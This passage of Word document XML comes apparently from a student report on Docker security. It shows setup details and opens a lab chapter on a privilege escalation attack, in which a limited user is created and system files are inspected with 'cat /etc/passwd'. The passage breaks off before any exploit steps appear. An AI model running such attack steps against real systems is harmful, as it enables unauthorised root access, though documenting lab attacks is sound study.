          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: installing Docker engine on the host machine.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w14:paraId="56818F50" w14:textId="54AE76EF" w:rsidR="00C36B0D" w:rsidRPr="00C36B0D" w:rsidRDefault="005317CB" w:rsidP="00C36B0D">
      <w:r>
        <w:t xml:space="preserve">The screenshot below verifies the Docker </w:t>
      </w:r>
      <w:r w:rsidR="0057237A">
        <w:t>version installed on the host machine.</w:t>
      </w:r>
      <w:r w:rsidR="00FD6E3E">
        <w:t xml:space="preserve"> The Docker engine installed is version 20.10.7 </w:t>
      </w:r>
      <w:r w:rsidR="00C53AB0">
        <w:t xml:space="preserve">and is the </w:t>
      </w:r>
      <w:r w:rsidR="0052127E">
        <w:t>latest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001AA31D" w14:textId="0A420BBB" w:rsidR="000E6D8C" w:rsidRDefault="000E6D8C" w:rsidP="000E6D8C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15C504E8" wp14:editId="70CF54B2">
            <wp:extent cx="4368464" cy="2495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1448" cy="2497255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38793BB6" w14:textId="2398BFE1" w:rsidR="00236B4B" w:rsidRDefault="004B3E49" w:rsidP="005536FC">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc86858607"/>
      <w:r w:rsidRPr="005536FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="005536FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="005536FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="005536FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="005536FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005536FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="0052127E" w:rsidRPr="005536FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005536FC" w:rsidRPr="005536FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>verification Docker engine.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w14:paraId="35396864" w14:textId="7C35BDE3" w:rsidR="00C36B0D" w:rsidRPr="00C36B0D" w:rsidRDefault="00361831" w:rsidP="00C36B0D">
      <w:r>
        <w:t xml:space="preserve">Further, this project uses a single </w:t>
      </w:r>
      <w:r w:rsidR="00695474">
        <w:t>laptop using Ubuntu OS</w:t>
      </w:r>
      <w:r w:rsidR="00D215CD">
        <w:t xml:space="preserve">. The specifications of the laptop used </w:t>
      </w:r>
      <w:r w:rsidR="000F2908">
        <w:t>is presented in figure 17.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB893D0" w14:textId="1852BF5F" w:rsidR="00640DE2" w:rsidRDefault="000E57A0" w:rsidP="000E6D8C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DE2A332" wp14:editId="425530E0">
            <wp:extent cx="4748859" cy="1797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50436" cy="1797647"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1539109B" w14:textId="3280FD2F" w:rsidR="004B3E49" w:rsidRPr="00DD5169" w:rsidRDefault="00C36B0D" w:rsidP="00DD5169">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc86858608"/>
      <w:r w:rsidRPr="00DD5169">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5169">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00DD5169">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00DD5169">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5169">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00DD5169">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="000F2908" w:rsidRPr="00DD5169">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD5169" w:rsidRPr="00DD5169">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the laptop specifications</w:t>
      </w:r>
      <w:r w:rsidR="007D6972">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w14:paraId="7208BAF9" w14:textId="4D4DF336" w:rsidR="001621DA" w:rsidRDefault="001621DA" w:rsidP="001621DA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc86859294"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SUMMARY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w14:paraId="427833BC" w14:textId="782FC0FC" w:rsidR="00D84EA5" w:rsidRPr="00D84EA5" w:rsidRDefault="00D84EA5" w:rsidP="00D84EA5">
      <w:r>
        <w:t xml:space="preserve">This section presented the design and implementation process </w:t>
      </w:r>
      <w:r w:rsidR="000957B7">
        <w:t>for the aimed attacks. All the attacks will be conducted on a single Ubuntu laptop with OS version 20.04 and Docker version 20.10.7 installed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A96E0E" w14:textId="6F7B82D5" w:rsidR="00150103" w:rsidRDefault="004B3E49" w:rsidP="007E32EC">
      <w:r>
        <w:t xml:space="preserve">Following </w:t>
      </w:r>
      <w:r w:rsidR="000957B7">
        <w:t>chapter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cover</w:t>
      </w:r>
      <w:r w:rsidR="000957B7">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the execution procedure</w:t>
      </w:r>
      <w:r w:rsidR="000957B7">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00093277">
        <w:t xml:space="preserve"> and methods applied to</w:t>
      </w:r>
      <w:r w:rsidR="000957B7">
        <w:t xml:space="preserve"> under</w:t>
      </w:r>
      <w:r w:rsidR="00093277">
        <w:t>take of each attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> step by step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70572787" w14:textId="5A945383" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="0754B0F8" w14:textId="5715CE8B" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="7AA18A07" w14:textId="22391F16" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="046A623E" w14:textId="00479070" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="547CB6BC" w14:textId="4F7B1DEB" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="41379D82" w14:textId="0DA2559A" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="27BAB277" w14:textId="405D3794" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="5329F305" w14:textId="0B5CE0E2" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="052BFE52" w14:textId="03C83675" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="32DDCF7E" w14:textId="026DD5F7" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="4AB61941" w14:textId="46F3B91E" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="0F1190F6" w14:textId="2FF2F7C6" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="17182892" w14:textId="14D92103" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="68D43DDD" w14:textId="315635F5" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="5360B658" w14:textId="40402C9A" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="78FBF997" w14:textId="77777777" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="7C6A6BB6" w14:textId="6877F624" w:rsidR="006536B6" w:rsidRDefault="006536B6" w:rsidP="006536B6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc86859295"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>-TESTING AND EXPERIMENTING</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w14:paraId="5D2A9F50" w14:textId="7595A89F" w:rsidR="006536B6" w:rsidRDefault="006536B6" w:rsidP="006536B6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc86859296"/>
      <w:r>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w14:paraId="66D78852" w14:textId="2F112A35" w:rsidR="006536B6" w:rsidRPr="006536B6" w:rsidRDefault="006536B6" w:rsidP="006536B6">
      <w:r>
        <w:t xml:space="preserve">This chapter will provide the techniques and procedures used to undertake of </w:t>
      </w:r>
      <w:r w:rsidR="003F1E36">
        <w:t>the attacks discussed in the previous chapter</w:t>
      </w:r>
      <w:r w:rsidR="001621DA">
        <w:t>. All the steps taken to execute each attack are presented in screenshots along with a brief explanation of the commands and methods applied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1531DC6E" w14:textId="5205E731" w:rsidR="00B036F9" w:rsidRDefault="00B036F9" w:rsidP="00B036F9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc86859297"/>
      <w:r>
        <w:t>Privilege Escalation Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w14:paraId="478314EC" w14:textId="049B11CD" w:rsidR="00181332" w:rsidRDefault="00477958" w:rsidP="00181332">
      <w:r>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="00CF2CAF">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r>
        <w:t>attack</w:t>
      </w:r>
      <w:r w:rsidR="00CF2CAF">
        <w:t>’s primary purpose</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is to show how a user with limited privilege can elevate </w:t>
      </w:r>
      <w:r w:rsidR="00A213D1">
        <w:t>to a root user. Therefore, a user is created on the host machine using the command shown in figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00363029">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00623591">
        <w:t xml:space="preserve"> and is verified </w:t>
      </w:r>
      <w:r w:rsidR="008E24EC">
        <w:t>as shown in figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00363029">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="008E24EC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F9BFF3" w14:textId="57E35800" w:rsidR="00A213D1" w:rsidRDefault="00A213D1" w:rsidP="00A213D1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31AAB517" wp14:editId="264F76DA">
            <wp:extent cx="4597400" cy="2380946"/>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98610" cy="2381573"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B3E47F" w14:textId="29A29FB2" w:rsidR="00A213D1" w:rsidRDefault="005D38BA" w:rsidP="00A213D1">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc86858609"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00A213D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">igure </w:t>
      </w:r>
      <w:r w:rsidR="00A213D1" w:rsidRPr="00A213D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A213D1" w:rsidRPr="00A213D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00A213D1" w:rsidRPr="00A213D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidR="00A213D1" w:rsidRPr="00A213D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A213D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: user created on the host machine.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w14:paraId="387EB56F" w14:textId="203F721D" w:rsidR="008E24EC" w:rsidRDefault="008E24EC" w:rsidP="008E24EC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C64F7C8" wp14:editId="2E398E68">
            <wp:extent cx="4476114" cy="2012950"/>
            <wp:effectExtent l="0" t="0" r="127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6770" cy="2013245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D098F30" w14:textId="27DC765E" w:rsidR="008E24EC" w:rsidRDefault="008E24EC" w:rsidP="008E24EC">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc86858610"/>
      <w:r w:rsidRPr="008E24EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="008E24EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008E24EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="008E24EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidRPr="008E24EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008E24EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>output of</w:t>
      </w:r>
      <w:r w:rsidR="00A33322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A33322" w:rsidRPr="00A33322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r w:rsidRPr="00A33322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command on the host</w:t>
      </w:r>
      <w:r w:rsidRPr="008E24EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w14:paraId="1F38CCAE" w14:textId="143D2A4E" w:rsidR="0049257F" w:rsidRDefault="0049257F" w:rsidP="0049257F">
      <w:r>
        <w:t xml:space="preserve">Further, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00500A61">
        <w:t>is created with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> no permission to run </w:t>
      </w:r>
      <w:r w:rsidR="00500A61">
        <w:t xml:space="preserve">any </w:t>
      </w:r>
      <w:r>
        <w:t>root commands</w:t>
      </w:r>
      <w:r w:rsidR="00500A61">
        <w:t xml:space="preserve">. The output of the </w:t>
      </w:r>
      <w:r w:rsidR="00500A61" w:rsidRPr="00A33322">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>sudo visudo</w:t>
      </w:r>
      <w:r w:rsidR="00500A61">
        <w:t xml:space="preserve"> command shown in </w:t>
      </w:r>
      <w:r w:rsidR="00363029">
        <w:t>20</w:t>
